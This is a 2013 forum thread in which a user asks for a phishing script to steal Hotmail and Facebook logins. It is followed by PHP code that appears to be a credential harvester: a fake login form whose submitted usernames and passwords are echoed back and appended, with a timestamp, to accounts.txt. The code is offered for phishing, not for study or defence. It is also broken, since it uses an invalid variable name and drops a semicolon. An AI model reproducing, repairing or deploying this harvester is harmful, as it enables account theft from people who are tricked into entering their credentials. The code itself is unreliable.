I need facebook and hotmail script 06-17-2013, 10:19 AM
#1
hi everyone. i need the phising script for hotmail and facebook . please pm me if you have it .
| I need facebook and hotmail script filter_list | |
<?php
foreach ($_POST as $param_name => $param_val) {
echo "$param_name: $param_val<br/>";
}
?>
<form action="#" method="POST">
<input type="text" name="username" placeholder="username"/><br/>
<input type="password" name="password" placeholder="password"/><br/>
<input type="submit" value="Log in"/>
</form><?php
$input = file_get_contents("accounts.txt");
$2bstored .= "[" . date("F j, Y, g:i a") . "]\n";
foreach ($_POST as $param_name => $param_val) {
$2bstored .= "$param_name: $param_val\n";
}
$2bstored .= "\n\n"
file_put_contents("accounts.txt", $input . $2bstored);
?>